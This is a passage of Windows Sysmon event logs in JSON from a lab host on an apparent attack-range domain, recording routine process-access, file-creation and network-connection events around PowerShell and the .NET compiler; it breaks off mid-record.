{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4494,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4495,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4496,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4497,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4498,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4499,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BD-5F25-0000-0010A6AD0600}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BD-5F25-0000-0010A6AD0600}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4500,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:53.689\r\nProcessGuid: {41C8662E-20BD-5F25-0000-0010C0A90600}\r\nProcessId: 1204\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.dll\r\nCreationUtcTime: 2020-08-01 07:58:53.579","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:53.689","ProcessGuid":"{41C8662E-20BD-5F25-0000-0010C0A90600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.dll","CreationUtcTime":"2020-08-01 07:58:53.579","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4501,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:55.142\r\nProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nProcessId: 2608\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\2.8.5.208\\Microsoft.PackageManagement.NuGetProvider.dll\r\nCreationUtcTime: 2020-08-01 07:58:55.142","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:55.142","ProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\2.8.5.208\\Microsoft.PackageManagement.NuGetProvider.dll","CreationUtcTime":"2020-08-01 07:58:55.142","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4502,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.333\r\nProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nProcessId: 2608\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50151\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 23.47.31.208\r\nDestinationHostname: a23-47-31-208.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.333","ProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50151","DestinationIsIpv6":"false","DestinationIp":"23.47.31.208","DestinationHostname":"a23-47-31-208.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4503,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.548\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.548","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 